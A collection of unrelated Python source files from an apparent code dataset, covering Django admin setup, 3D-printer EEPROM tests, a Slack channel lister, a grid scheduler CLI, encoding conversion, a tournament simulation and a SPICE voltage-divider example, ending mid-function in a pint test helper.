    The output format is chosen, in order of preference, from: the explicit
    *format* argument, the format of the processed image, the format of the
    original image, and finally JPEG.
    """
    from .processors import ProcessorPipeline

    source_format = img.format
    pipeline = ProcessorPipeline(processors or [])
    processed = pipeline.process(img)
    target_format = format or processed.format or source_format or 'JPEG'
    return img_to_fobj(processed, target_format, autoconvert, **(options or {}))
| StarcoderdataPython |
9653792 | <gh_stars>1-10
import pyeccodes.accessors as _
def load(h):
h.alias('localDefinitionNumber', 'grib2LocalSectionNumber')
_.Template('grib2/local.[centreForLocal:l].[grib2LocalSectionNumber:l].def').load(h)
h.add(_.Position('offsetAfterLocalSection'))
| StarcoderdataPython |
11308414 |
"""
A suite of tests to be run on a replicator with the s3g python module. These tests are broken down into several categories:
"""
import os, sys
lib_path = os.path.abspath('../')
sys.path.append(lib_path)
lib_path = os.path.abspath('../s3g/')
sys.path.append(lib_path)
try:
import unittest2 as unittest
except ImportError:
import unittest
import optparse
import serial
import io
import struct
import array
import time
import s3g
import random
import csv
import matplotlib.pyplot as plt
from coding import *
axis_length_offsets = {
'x_axis':[0x0, '<I'],
'y_axis':[0x04, '<I'],
'z_axis':[0x08, '<I'],
'a_axis':[0x012, '<I'],
'b_axis':[0x016, '<I']
}
eeprom_acceleration_offsets = {
'active':[0x00,'<B'],
'default_rate':[0x02,'<h'],
'x_axis_rate':[0x04, '<h'],
'y_axis_rate':[0x06, '<h'],
'z_axis_rate':[0x08, '<h'],
'a_axis_rate':[0x0A, '<h'],
'b_axis_rate':[0x0C, '<h'],
'x_axis_jerk':[0x0E, '<BB'],
'y_axis_jerk':[0x10, '<BB'],
'z_axis_jerk':[0x12, '<BB'],
'a_axis_jerk':[0x14, '<BB'],
'b_axis_jerk':[0x16, '<BB'],
'minimum_speed':[0x18, '<h'],
'defaults_flag':[0x1A, '<B']
}
eeprom_map =[
{'name':'acceleration_settings', 'offset':0x016E, 'variables':eeprom_acceleration_offsets},
{'name':'axis_lengths', 'offset':0x018C, 'variables':axis_length_offsets},
{'name':'first_boot_flag', 'offset':0x0156, 'variables':{'first_boot':[0, '>B']}}
]
class ReplicatorStateTests(unittest.TestCase):
def setUp(self):
self.s3g = s3g.s3g()
self.s3g.file = serial.Serial(options.serialPort, '115200', timeout=1)
self.s3g.writer = s3g.StreamWriter(self.s3g.file)
self.s3g.SetExtendedPosition([0, 0, 0, 0, 0])
self.s3g.AbortImmediately()
time.sleep(2)
def tearDown(self):
self.s3g.file.close()
def ReadEEpromVariable(self, map_dict, variable):
"""
read a variable stored in eeprom
@param name: dictionary value for eeprom_map 'name'
@param variable: dictionary value for 'variable' sub set in eeprom_map dict
"""
offset = map_dict['offset'] + map_dict['variables'][variable][0]
data_type = map_dict['variables'][variable][1]
data = UnpackResponse(data_type, self.s3g.ReadFromEEPROM(offset, struct.calcsize(data_type)))
print [variable, data]
def CheckVariableRange(self, data, map_dict, variable):
"""
read a variable stored in eeprom
@param name: dictionary value for eeprom_map 'name'
@param variable: dictionary value for 'variable' sub set in eeprom_map dict
"""
valid_range = map_dict['variables'][variable][2]
self.assertTrue(data in valid_range)
def EEpromCheckForValidEntries(self):
"""
This test checks eeprom values
Additionaly eeprom checks may be added in the future
"""
for field in eeprom_map:
for var in field['variables']:
data = self.ReadEEpromVariable(field, var)
"""
# acceleration on/off
data = UnpackResponse('B', self.s3g.ReadFromEEPROM(acceleration_map_start + eeprom_acceleration_offsets['active'], 1))
print data[0]
self.assertTrue( data[0] in [0,1])
# default acceleration rate
data = UnpackResponse('h', self.s3g.ReadFromEEPROM(acceleration_map_start + eeprom_acceleration_offsets['default_rate'], 2))
print data[0]
self.assertTrue(data[0] in range(0,5000))
# default axis acceleration rates
for i in range(0,10, 2):
data = UnpackResponse('h', self.s3g.ReadFromEEPROM(acceleration_map_start+eeprom_acceleration_offsets['axis_rate'] +i, 2))
print data[0]
self.assertTrue(data[0] in range(0,5000))
# default axis jerk rates
for i in range(0,8,2):
data = self.s3g.ReadFromEEPROM(acceleration_map_start + eeprom_acceleration_offsets['axis_jerk']+ i, 2)
byte_data = UnpackResponse('BB', data);
float_data = (float(byte_data[0]) + float(byte_data[1]) / 256.0)
print float_data
self.assertTrue(float_data > 0.0 and float_data < 40.0)
# default minimum speed
data = UnpackResponse('h', self.s3g.ReadFromEEPROM(acceleration_map_start+eeprom_acceleration_offsets['minimum_speed'], 2))
print data[0]
self.assertTrue(data[0] in range(0,40))
# acceleration defaults initialized flag
data = UnpackResponse('B', self.s3g.ReadFromEEPROM(acceleration_map_start+eeprom_acceleration_offsets['defaults_flag'], 1))
print data[0]
self.assertTrue(data[0] in [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80])
"""
def EEpromTestResetToFactory(self):
self.s3g.ResetToFactory()
self.EEpromCheckForValidEntries()
def EEpromTestFullReset(self):
for i in range(0, eeprom_map):
self.s3g.WriteToEEPROM(i, [0xFF])
self.s3g.Reset()
self.EEpromCheckForValidEntries()
def EEpromWriteInvalidValues(self):
for i in range (acceleration_map_start + 10, eeprom_map):
self.s3g.WriteToEEPROM(i, [random.randint(0,255)])
self.EEpromCheckForValidEntries()
def HeatingErrorTest(self):
tool_temps = []
heat_cycle = 0
csv_writer = csv.writer(open(options.filename, 'wb'), delimiter = ',')
print "\n"
tool_num = 2
if options.toolCount == "single":
tool_num = 1
while(heat_cycle < 50):
for tool_index in range(0,tool_num):
print "heat_cycle: %d" % (heat_cycle)
#randomize whether tool or platform is heated first
tool_first = random.randint(0,1)
if tool_first is 0:
self.s3g.SetToolheadTemperature(tool_index,225);
self.s3g.SetPlatformTemperature(tool_index,110);
else:
self.s3g.SetPlatformTemperature(tool_index,110);
self.s3g.SetToolheadTemperature(tool_index,225);
# move axes to simulate start.gcode
self.s3g.FindAxesMaximums(['x', 'y'], 300, 60)
self.s3g.FindAxesMinimums(['z'], 200, 60)
self.s3g.RecallHomePositions(['x', 'y', 'z', 'a', 'b'])
AnchorLocation = [-110.5*94.1397, -74*94.1397, 150*400, 0, 0]
self.s3g.QueueExtendedPoint(AnchorLocation, 200)
start_time = time.time()
finished = False
while finished is False:
tool_temps.append(self.s3g.GetToolheadTemperature(tool_index))
csv_writer.writerow([time.time(), tool_temps[-1]])
tool_status = self.s3g.GetToolStatus(tool_index)
for error, status in tool_status.iteritems() :
if status is True:
finished = True
if error is not "ExtruderReady":
print tool_status
print "tool head %d fail" % (tool_index)
if tool_first is True:
print "tool heated before platform"
else:
print "tool heated after platform"
print "elapsed time: %d" % (time.time() - start_time)
print "heat cycles: %d" % (heat_cycle)
plt.plot(tool_temps)
plt.show()
self.assertFalse(status)
time.sleep(0.3)
tool_temps.append(self.s3g.GetToolheadTemperature(tool_index))
csv_writer.writerow([time.time(), tool_temps[-1]])
print "time: %d temp: %d count: %d " % (time.time() - start_time, tool_temps[-1], len(tool_temps))
self.s3g.SetToolheadTemperature(tool_index, 0)
self.s3g.SetPlatformTemperature(tool_index, 0)
# give the tool a random amount of time to cool
cool_time = (float(random.randint(1,16))/2) * 60
start_time = time.time()
print "cool time: %f minutes" % (cool_time/60)
while time.time() - start_time < cool_time:
tool_temps.append(self.s3g.GetToolheadTemperature(tool_index))
csv_writer.writerow([time.time(), tool_temps[-1]])
time.sleep(0.03)
heat_cycle += 1
plt.plot(tool_temps)
plt.show()
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option("-p", "--port", dest="serialPort", default="/dev/ttyACM0")
parser.add_option("-f", "--file", dest="filename", default="temp_data_back.csv")
parser.add_option("-t", "--tool_count", dest="toolCount", default="dual")
(options, args) = parser.parse_args()
del sys.argv[1:]
tests = unittest.TestSuite()
tests.addTest(ReplicatorStateTests('EEpromCheckForValidEntries'))
unittest.TextTestRunner(verbosity=2).run(tests)
| StarcoderdataPython |
5083486 | <reponame>cpieri/api_slack
import requests
from error import *
def list_channel(token):
print ('Your token is: {token}'.format(token=token))
pink = '\033[38;5;206m'
cyan = '\033[36m'
endl = '\033[0m'
channels = requests.get('https://slack.com/api/{type}.list?limit=100&token={t}&types=public_channel,private_channel,mpim'.format(type='conversations', t=token)).json()
chans = channels['channels']
for chan in chans:
if chan['is_private']:
print (pink + 'Channel privé : {name}'.format(name=chan['name']) + endl)
else:
print (cyan + 'Channel public : {name}'.format(name=chan['name']) + endl) | StarcoderdataPython |
3551269 | from adminsortable.admin import SortableTabularInline, NonSortableParentAdmin
from django.contrib import admin
from django.db.models import Count
from simple_history.admin import SimpleHistoryAdmin
from music.models import Pays, Artiste, Style, Label, Playlist, Musique, MusiquePlaylist, Lien, Plateforme, LienPlaylist
@admin.register(Pays)
class PaysAdmin(admin.ModelAdmin):
list_display = ('nom',)
search_fields = ('nom',)
class MusiqueStyleInline(admin.TabularInline):
model = Musique.styles.through
autocomplete_fields = ('musique',)
@admin.register(Style)
class StyleAdmin(admin.ModelAdmin):
list_display = ('nom',)
search_fields = ('nom',)
prepopulated_fields = {'slug': ('nom',), }
save_on_top = True
inlines = [MusiqueStyleInline]
class LienPlaylistInline(admin.TabularInline):
model = LienPlaylist
readonly_fields = ('date_creation',)
class MusiquePlaylistInline(SortableTabularInline):
model = MusiquePlaylist
autocomplete_fields = ('musique',)
readonly_fields = ('date_ajout',)
@admin.register(Playlist)
class PlaylistAdmin(NonSortableParentAdmin):
list_display = ('nom', 'description', 'createur', 'nb_musique')
search_fields = ('nom',)
prepopulated_fields = {'slug': ('nom',), }
save_on_top = True
autocomplete_fields = ('createur',)
list_select_related = ('createur',)
inlines = [LienPlaylistInline, MusiquePlaylistInline]
def get_changeform_initial_data(self, request):
return {'createur': request.user}
def get_queryset(self, request):
qs = super(PlaylistAdmin, self).get_queryset(request)
return qs.annotate(nb_musique=Count('musiqueplaylist'))
def nb_musique(self, obj):
return obj.nb_musique
nb_musique.short_description = 'Nombre de musique'
nb_musique.admin_order_field = 'nb_musique'
class MusiqueInline(admin.StackedInline):
model = Musique
prepopulated_fields = {'slug': ('titre',), }
autocomplete_fields = ('featuring', 'remixed_by', 'styles', 'createur')
fk_name = 'artiste'
extra = 0
# TODO Remplir automatiquement le créateur pour la musique
class MusiqueRemixInline(admin.StackedInline):
model = Musique
prepopulated_fields = {'slug': ('titre',), }
autocomplete_fields = ('featuring', 'remixed_by', 'styles',)
fk_name = 'remixed_by'
extra = 0
verbose_name_plural = 'remixes'
verbose_name = 'remix'
# TODO Remplir automatiquement le créateur pour le remix
@admin.register(Artiste)
class ArtisteAdmin(SimpleHistoryAdmin):
list_display = ('nom_artiste', 'nom', 'prenom', 'ville', 'pays', 'date_creation', 'date_modification')
list_filter = ('styles', 'labels', 'createur')
search_fields = (
'nom_artiste', 'slug', 'prenom', 'nom',
)
date_hierarchy = 'date_creation'
ordering = ('-date_modification',)
prepopulated_fields = {'slug': ('nom_artiste',), }
readonly_fields = ('soundcloud_followers', )
autocomplete_fields = ('styles', 'pays', 'createur')
save_on_top = True
inlines = [MusiqueInline, MusiqueRemixInline]
def get_changeform_initial_data(self, request):
return {'createur': request.user}
class LienInline(admin.TabularInline):
model = Lien
class PlaylistInline(admin.TabularInline):
model = Playlist.musiques.through
autocomplete_fields = ('playlist',)
@admin.register(Musique)
class MusiqueAdmin(SimpleHistoryAdmin):
list_display = ('artiste_display', 'titre_display', 'album', 'label', 'createur',
'date_creation', 'date_modification', 'nombre_vue')
list_display_links = ('titre_display',)
list_filter = ('styles', 'remixed_by')
search_fields = (
'titre', 'slug', 'artiste__nom_artiste', 'artiste__slug', 'remixed_by__nom_artiste', 'remixed_by__slug',
'featuring__nom_artiste', 'featuring__slug', 'album', 'label__nom'
)
date_hierarchy = 'date_creation'
ordering = ('-date_modification',)
prepopulated_fields = {'slug': ('titre',), }
autocomplete_fields = ('artiste', 'featuring', 'remixed_by', 'styles', 'label')
list_select_related = ('artiste', 'remixed_by', 'createur__user', 'label')
save_on_top = True
list_per_page = 20
inlines = [PlaylistInline, LienInline]
def get_changeform_initial_data(self, request):
return {'createur': request.user}
@admin.register(Plateforme)
class PlateformeAdmin(admin.ModelAdmin):
list_display = ('nom', 'slug')
search_fields = ('nom',)
prepopulated_fields = {'slug': ('nom',)}
@admin.register(LienPlaylist)
class LienPlaylistAdmin(admin.ModelAdmin):
list_display = ('id', 'playlist', 'url', 'plateforme', 'date_creation')
list_filter = ('plateforme',)
search_fields = ('playlist__nom', 'plateforme__nom')
date_hierarchy = 'date_creation'
autocomplete_fields = ('playlist',)
list_select_related = ('playlist', 'plateforme')
@admin.register(Lien)
class LienAdmin(admin.ModelAdmin):
list_display = ('id', 'musique', 'url', 'plateforme', 'createur', 'click_count', 'date_creation', 'date_validation')
list_filter = ('plateforme',)
search_fields = (
'musique__titre', 'musique__artiste__nom_artiste', 'plateforme__nom'
)
date_hierarchy = 'date_creation'
autocomplete_fields = ('musique',)
list_select_related = ('musique__artiste', 'musique__remixed_by', 'createur__user', 'plateforme')
list_per_page = 30
def get_changeform_initial_data(self, request):
return {'createur': request.user}
@admin.register(Label)
class LabelAdmin(admin.ModelAdmin):
list_display = ('nom', 'description')
search_fields = ('nom', 'artistes__nom_artiste', 'styles__nom')
prepopulated_fields = {'slug': ('nom',), }
autocomplete_fields = ('artistes', 'styles')
| StarcoderdataPython |
12822064 | import puzzle_1
import puzzle_2
# Read lines from input file and assign them to a list called input
with open("../input.txt", "r") as information:
input = information.readlines()
# Declares variables for each of the puzzles solutions and assigns respective functions to it
# (See puzzle_1 and puzzle_2 python files for each function code)
puzzle1_solution = puzzle_1.solve(input)
# puzzle2_solution = puzzle_2.solve(data)
# Prints both solutions
print("Puzzle 1 Solution :" , puzzle1_solution)
# print("Puzzle 2 Solution :" , puzzle2_solution) | StarcoderdataPython |
3534070 | # Uses Sharded vote counter, to increase vote throughput.
# https://cloud.google.com/appengine/articles/sharding_counters
# Import external modules.
from google.appengine.ext import ndb
import math
# Import app modules.
from configuration import const as conf
from constants import Constants
import logging
import proposal
import reasonVote
import traceback
# Constants
const = Constants()
const.MAX_RETRY = 3
const.MAX_VOTE_RETRY = 3
const.CHAR_LENGTH_UNIT = 100
# Persistent record
# Parent key: proposal? No, use key-properties instead, for better throughput.
class Reason(ndb.Model):
proposalId = ndb.StringProperty() # Primary key. Needed to retrieve all reasons for a single proposal.
requestId = ndb.StringProperty() # Search index. Needed to retrieve all reasons for request.
content = ndb.StringProperty()
proOrCon = ndb.StringProperty() # { 'pro', 'con' }
creator = ndb.StringProperty()
allowEdit = ndb.BooleanProperty()
voteCount = ndb.IntegerProperty( default=0 )
score = ndb.FloatProperty( default=0 )
def voteCountToScore( voteCount, content ):
contentLen = len(content)
# score = votes per CHAR_LENGTH_UNITs used
unitsUsed = float(contentLen) / float(const.CHAR_LENGTH_UNIT) if contentLen >= const.CHAR_LENGTH_UNIT else 1.0
return float(voteCount) / float(unitsUsed)
@ndb.transactional( retries=const.MAX_RETRY )
def setEditable( reasonId, editable ):
reasonRecord = Reason.get_by_id( int(reasonId) )
reasonRecord.allowEdit = editable
reasonRecord.put()
# Returns a group of query futures.
def retrieveTopReasonsAsync( proposalId, maxReasons ):
proposalIdStr = str( proposalId )
maxReasonsPerColumn = maxReasons / 2
reasonRecordsFutures = []
reasonRecordsFuture = Reason.query( Reason.proposalId==proposalIdStr, Reason.proOrCon==conf.PRO ).order(
-Reason.score ).fetch_async( maxReasonsPerColumn )
reasonRecordsFutures.append( reasonRecordsFuture )
reasonRecordsFuture = Reason.query( Reason.proposalId==proposalIdStr, Reason.proOrCon==conf.CON ).order(
-Reason.score ).fetch_async( maxReasonsPerColumn )
reasonRecordsFutures.append( reasonRecordsFuture )
return [ f for f in reasonRecordsFutures if f is not None ]
# Returns a group of query records.
def fetchReasonRecordsFutures( reasonRecordsFutures ):
reasonRecords = []
for f in reasonRecordsFutures:
if f is not None:
reasonRecordsBatch = f.get_result()
if reasonRecordsBatch is not None:
reasonRecords.extend( reasonRecordsBatch )
return reasonRecords
# Assumes that user can vote for only 1 reason per proposal.
# Parameters: voteUp:boolean
# Returns success:boolean, updated Reason, updated ReasonVote
def vote( requestId, proposalId, reasonId, userId, voteUp, isRequestForProposals=False ):
success, reasonRec, reasonVoteRec, prosInc, consInc = _voteTransaction( requestId, proposalId, reasonId, userId, voteUp ) # Transaction
if success and isRequestForProposals and (prosInc != 0 or consInc != 0):
logging.debug( 'reason.vote() incrementAsync() starting' )
proposal.incrementTasklet( requestId, proposalId, prosInc, consInc ) # Async
logging.debug( 'reason.vote() incrementAsync() done' )
return success, reasonRec, reasonVoteRec
# Assumes that user can vote for only 1 reason per proposal.
# Parameters: voteUp:boolean
# Returns success:boolean, Reason, ReasonVote
@ndb.transactional(xg=True, retries=const.MAX_VOTE_RETRY) # Cross-table is ok because vote record (user x proposal) is not contended, and reason vote count record is locking anyway.
def _voteTransaction( requestId, proposalId, reasonId, userId, voteUp ):
    """Transactionally flag the user's vote and apply the resulting count changes.

    Returns (success, reasonRecord, voteRecord, prosInc, consInc), where
    prosInc/consInc are the net deltas applied to pro/con vote counts (they may
    be negative when an earlier vote is moved or retracted).  If any increment
    fails, the whole transaction -- including _setVote() -- is rolled back.
    """
    # Flag the vote first; this record is keyed per user x proposal, so uncontested.
    voteFlagSuccess, voteCountIncrements, voteRecord = reasonVote._setVote( requestId, proposalId, reasonId, userId, voteUp ) # Uncontested
    logging.debug( 'vote() voteFlagSuccess=' + str(voteFlagSuccess) + ' voteCountIncrements=' + str(voteCountIncrements) + ' voteRecord=' + str(voteRecord) )
    if not voteFlagSuccess: return False, None, voteRecord, 0, 0
    # If any reason vote increment fails... then undo reasonVote._setVote() and all reason vote increments via transaction.
    reasonRecord = None
    prosInc = 0
    consInc = 0
    # Apply each increment (Python 2: dict.iteritems); remember the record for the
    # reason actually voted on, and tally the net pro/con deltas for the caller.
    for incReasonId, voteCountIncrement in voteCountIncrements.iteritems():
        incReasonRecord = _incrementVoteCount( incReasonId, voteCountIncrement ) # Contested lightly
        if str(incReasonRecord.key.id()) == reasonId: reasonRecord = incReasonRecord
        if incReasonRecord.proOrCon == conf.PRO: prosInc += voteCountIncrement
        elif incReasonRecord.proOrCon == conf.CON: consInc += voteCountIncrement
    return True, reasonRecord, voteRecord, prosInc, consInc
# Increment vote count, inside another transaction.
# Returns updated Reason record, or throws transaction Conflict exception.
def _incrementVoteCount( reasonId, amount ):
    """Add amount to a reason's vote count and recompute its score.

    Runs inside the caller's transaction.  Returns the updated Reason record;
    a transaction Conflict exception may propagate to the caller.
    """
    record = Reason.get_by_id( int(reasonId) )
    record.voteCount = record.voteCount + amount
    record.score = voteCountToScore( record.voteCount, record.content )
    record.put()
    return record
| StarcoderdataPython |
6676148 | <reponame>ngvozdiev/ncode
import numpy as np
import matplotlib.pylab as plt
def PlotCDF(x, label):
    """Plot the empirical CDF of the samples in x on the current matplotlib axes."""
    values = np.sort(x)
    cumulative = np.arange(len(values)) / float(len(values))
    plt.plot(values, cumulative, label=label)
# NOTE: the {{...}} tokens are template placeholders filled in by the code that
# renders this script; the file is not runnable as-is.
for filename, label in {{files_and_labels}}:
    data = np.loadtxt(filename)
    PlotCDF(data, label=label)
ax = plt.gca()
for x_pos, label in {{lines_and_labels}}:
    # NOTE(review): relies on matplotlib's private color-cycle API
    # (ax._get_lines); may break across matplotlib versions -- confirm.
    next_color = ax._get_lines.get_next_color()
    plt.axvline(x_pos, label=label, color=next_color)
plt.title('{{title}}')
plt.xlabel('{{xlabel}}')
plt.ylabel('{{ylabel}}')
plt.legend()
plt.show()
| StarcoderdataPython |
8042738 | <gh_stars>0
import argparse
from threading import Thread
from virtualgrid.grid_scheduler import GridScheduler
from virtualgrid.node import Node
from virtualgrid.resource_manager import ResourceManager
from virtualgrid.vector_clock import VectorClock
def start_node(args):
    """Start a worker node that listens for commands on the configured port."""
    clock = VectorClock(args.pid, args.np)
    Node(args.port, clock).listen()
def start_resource_manager(args):
    """Start a resource manager: one thread listens, another runs the job scheduler."""
    clock = VectorClock(args.pid, args.np)
    # NOTE(review): the hard-coded 2 is passed positionally to ResourceManager;
    # its meaning is defined by ResourceManager's signature elsewhere -- confirm.
    manager = ResourceManager(args.id, 2, args.gs_address, args.node_addresses, args.port, clock)
    for worker in (manager.listen, manager.run_job_scheduler):
        Thread(target=worker).start()
def start_grid_scheduler(args):
    """Start a grid scheduler in the selected sub-mode ('accept' or 'reschedule').

    args.rms entries are 'id,ip:port' strings mapping RM ids to addresses.
    """
    rm_pairs = (entry.split(',') for entry in args.rms)
    rms = {rm_id: rm_address for rm_id, rm_address in rm_pairs}
    gs = GridScheduler(rms, VectorClock(args.pid, args.np), args.port)
    if args.gs_mode == 'accept':
        gs.listen()
    elif args.gs_mode == 'reschedule':
        gs.run_rescheduling()
def main():
    """Parse command-line arguments and start the selected component.

    Sub-commands:
      node -- start a worker node
      rm   -- start a resource manager
      gs   -- start a grid scheduler ('accept' or 'reschedule' mode)
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--port',
        type=int,
        # Fix: dropped a stray f-prefix from a placeholder-less f-string.
        help='port to listen on for commands from a resource manager.',
        required=True
    )
    parser.add_argument(
        '--pid',
        type=int,
        required=True,
        help='process id of this resource manager (has to be unique)'
    )
    parser.add_argument(
        '--np',
        type=int,
        required=True,
        help='number of nodes in the system (np >= id)'
    )
    subparsers = parser.add_subparsers(dest='module')
    subparsers.required = True
    parser_node = subparsers.add_parser('node', help='start a node')
    parser_rm = subparsers.add_parser('rm', help='start a resource manager')
    parser_rm.add_argument('--gs-address', type=str, required=True,
                           help='address of a grid scheduler formatted as ip:port')
    parser_rm.add_argument('node_addresses', metavar='NODE_ADDR', type=str, nargs='+',
                           help='address of nodes belonging to this cluster formatted as ip:port')
    parser_rm.add_argument('--id', type=int, required=True,
                           help='id of the resource manager (has to be unique)')
    parser_gs = subparsers.add_parser('gs', help='start a grid scheduler')
    gs_subparsers = parser_gs.add_subparsers(dest='gs_mode')
    gs_subparsers.required = True
    gs_accept = gs_subparsers.add_parser('accept', help='accept jobs from resource managers')
    gs_accept.add_argument('rms', metavar='RM', type=str, nargs='+',
                           help='address and IDs of resource managers formatted as id,ip:port')
    gs_reschedule = gs_subparsers.add_parser('reschedule', help='reschedule jobs to keep the load even')
    gs_reschedule.add_argument('rms', metavar='RM', type=str, nargs='+',
                               help='address and IDs of resource managers formatted as id,ip:port')
    args = parser.parse_args()
    # Dispatch to the selected component.
    if args.module == 'node':
        start_node(args)
    elif args.module == 'rm':
        start_resource_manager(args)
    elif args.module == 'gs':
        start_grid_scheduler(args)
    else:
        # Bug fix: print_help() is a method of the parser, not of the parsed
        # Namespace -- args.print_help() would raise AttributeError.
        # (Unreachable while subparsers.required is True; kept as a guard.)
        parser.print_help()


if __name__ == '__main__':
    main()
| StarcoderdataPython |
272711 | <reponame>tagwan/scripts<gh_stars>0
# !/usr/bin/env python
# -*- coding:utf-8 -*-
"""
批量修改文件编码,例如从ansi转为utf-8
"""
import os
import sys
import codecs
import chardet
def get_file_extension(file):
    """Return the extension of file's basename, including the leading dot ('' if none)."""
    basename = os.path.split(file)[1]
    return os.path.splitext(basename)[1]
def get_file_encode(filename):
    """Detect a file's character encoding with chardet.

    Returns chardet's result dict, e.g. {'encoding': ..., 'confidence': ...}.
    """
    with open(filename, 'rb') as handle:
        raw = handle.read()
    return chardet.detect(raw)
def process_dir(root_path):
    """Recursively convert every eligible source file under root_path in place."""
    for dirpath, _dirnames, filenames in os.walk(root_path):
        for name in filenames:
            full_path = os.path.join(dirpath, name)
            process_file(full_path, full_path)
def process_file(filename_in, filename_out):
    """Convert one C/C++ source file to UTF-8.

    filename_in  : input file (full path + file name)
    filename_out : output file (full path + file name)

    Only .c/.h/.cpp/.hpp files are processed.  Files already detected as UTF-8
    are left untouched; files whose encoding cannot be detected are assumed to
    be 'windows-1251' (example detected encodings: 'windows-1251', 'UTF-8-SIG').
    """
    extension = get_file_extension(filename_in).lower()
    if extension not in ('.c', '.h', '.cpp', '.hpp'):
        return
    # Target encoding of the output file.
    dest_file_encode = 'utf-8'
    encoding_type = get_file_encode(filename_in)
    src_file_encode = encoding_type['encoding']
    if src_file_encode is None:
        # chardet could not detect an encoding; fall back to windows-1251.
        src_file_encode = 'windows-1251'
    elif src_file_encode.lower() == 'utf-8':
        # Already UTF-8 -- nothing to do.  Fix: the comparison is now
        # case-insensitive, since chardet may report 'utf-8' or 'UTF-8'.
        return
    # Bug fix: report src_file_encode here.  The old code concatenated
    # encoding_type['encoding'], which is None when detection failed and
    # raised a TypeError instead of converting the file.
    print("[Convert]File:" + filename_in + " from:" + src_file_encode + " to:UTF-8")
    try:
        with codecs.open(filename=filename_in, mode='r', encoding=src_file_encode) as fi:
            data = fi.read()
        with open(filename_out, mode='w', encoding=dest_file_encode) as fo:
            fo.write(data)
        # Re-detect and print the written file's encoding for verification.
        with open(filename_out, 'rb') as f:
            data = f.read()
        print(chardet.detect(data))
    except Exception as e:
        # Best-effort conversion: report the failure and continue with the next file.
        print(e)
def dump_file_encode(root_path):
    """Print the chardet-detected encoding of every file under root_path.

    :param root_path: directory tree to inspect
    :return: None
    """
    for dirpath, _dirs, filenames in os.walk(root_path):
        for name in filenames:
            full_path = os.path.join(dirpath, name)
            with open(full_path, 'rb') as handle:
                raw = handle.read()
            detected = chardet.detect(raw)
            print("FILE:" + name + " ENCODE:" + str(detected))
def convert(path):
    """Batch-convert a single file, or every file in a directory tree, to UTF-8.

    path : input file or directory (e.g. sys.argv[1]).
    """
    if os.path.isdir(path):
        process_dir(path)
    elif os.path.isfile(path):
        process_file(path, path)


if __name__ == '__main__':
    convert(r'E:\Workspace\cplus\tlbb-master\tlbb-master')
| StarcoderdataPython |
11281420 | <filename>vagrant/myTourney.py
__author__ = 'erik'
from tournament import *
import math
import random
import decimal
# Simulation driver for the tournament module: registers players, runs a full
# Swiss-pairing tournament with random match outcomes, and prints standings.
# Python 2 script (uses print statements).
db = connect()
deletePlayers()
deleteMatches()
# Register an odd number of players (17) so that bye matches are exercised.
registerPlayer("Ace")
registerPlayer("Jimmy")
registerPlayer("Phil")
registerPlayer("Sport")
registerPlayer("Ed")
registerPlayer("Lucy")
registerPlayer("Jake")
registerPlayer("Adam")
registerPlayer("Ace2")
registerPlayer("Jimmy2")
registerPlayer("Phil2")
registerPlayer("Sport2")
registerPlayer("Ed2")
registerPlayer("Lucy2")
registerPlayer("Jake2")
registerPlayer("Adam2")
registerPlayer("Jake3")
# registerPlayer("Adam3")
count = countPlayers()
# A Swiss tournament needs ceil(log2(n)) rounds to determine a winner.
rounds = int(math.ceil(math.log(count,2)))
currentRound = 0  # NOTE(review): never used below
for x in range(0, rounds):
    print 'Round {0} Matches\n'.format(x+1)
    playerPairings = swissPairings()
    for playerPair in playerPairings:
        # Pairings look like (id1, name1, id2, name2); id -1 marks a bye slot.
        if playerPair[0] == -1 or playerPair[2] == -1:
            # this is a bye match: the real player wins automatically
            if playerPair[0] != -1:
                reportMatch(playerPair[0], playerPair[2])
                print 'Winner: {0}\tLoser: {1}'.format(playerPair[1], playerPair[3])
            else:
                reportMatch(playerPair[2], playerPair[0])
                print 'Winner: {0}\tLoser: {1}'.format(playerPair[3], playerPair[1])
        elif random.random() < .5:
            # first player won (a coin flip decides non-bye matches)
            reportMatch(playerPair[0], playerPair[2])
            print 'Winner: {0}\tLoser: {1}'.format(playerPair[1], playerPair[3])
        else:
            # second player won
            reportMatch(playerPair[2], playerPair[0])
            print 'Winner: {0}\tLoser: {1}'.format(playerPair[3], playerPair[1])
    standings = playerStandings()
    # create local variable for calculating rank
    rank = 0
    currentWins = -1
    print "\nCurrent Tournament Standings\n"
    print 'Rank\tName\tPoints'
    for row in standings:
        # check each players wins against wins from prior players.
        # increment rank if necessary. Rank is just for tourney rank
        if currentWins != row[2]:
            rank = rank + 1
            currentWins = row[2]
        print '{0}\t{1}\t{2}'.format(rank, row[1], row[2])
    print '\n-----------------------------\n'
    #return results
| StarcoderdataPython |
1681481 | #r# ============================================
#r# Resistive voltage divider
#r# ============================================
#r# This example shows the simulation of a simple voltage divider made of resistances
######################################### IMPORT UTILITIES #########################################
import sys
# Insert at 1, 0 is the script path
# Inserting it at the beginning has the benefit of guaranteeing that the path is searched before others (even built-in ones) in the case of naming conflicts
sys.path.insert(1, '../utilities/')
from utilities import format_output
####################################################################################################
import PySpice.Logging.Logging as Logging
logger = Logging.setup_logging()
####################################################################################################
from PySpice.Spice.Netlist import Circuit
from PySpice.Unit import *
####################################################################################################
# CIRCUIT DEFINITION
####################################################################################################
circuit = Circuit('Voltage divider')

# Define the netlist: a 10 V source feeding an 8k/2k resistive divider, so the
# expected voltage at node 'out' is 10 V * 2k / (8k + 2k) = 2 V.
circuit.V('in', 'input', circuit.gnd, 10@u_V)
circuit.R(1, 'input', 'out', 8@u_kOhm)
circuit.R(2, 'out', circuit.gnd, 2@u_kOhm)

# Show the netlist
print('**** Circuit netlist: ****')
print(circuit)

####################################################################################################
# SIMULATION
####################################################################################################

# Set up the simulation
simulator = circuit.simulator(temperature=25, nominal_temperature=25)

# Run a DC operating-point analysis (single bias point, no sweep)
analysis = simulator.operating_point()

# Show results: extract node voltages/branch currents via the utilities helper
print('**** Simulation result: ****')
voltages, currents = format_output(analysis, 'operating_point')
out_value = voltages['out']
print(out_value, " [V]")
4877663 | <reponame>ryanpdwyer/jittermodel<gh_stars>1-10
from jittermodel import u
import nose
import functools
from nose.tools import assert_almost_equal, assert_raises
import unittest
def pint_assert_almost_equal(first, second, unit=None, places=None,
                             msg=None, delta=None):
    """assert_almost_equal for pint quantities.

    Use ``unit`` to pick the unit the comparison is made in.  By default the
    second quantity is converted in place to the first quantity's units.
    """
    if unit is None:
        second.ito(first.units)
    else:
        # Convert both operands in place to the requested unit.
        for quantity in (first, second):
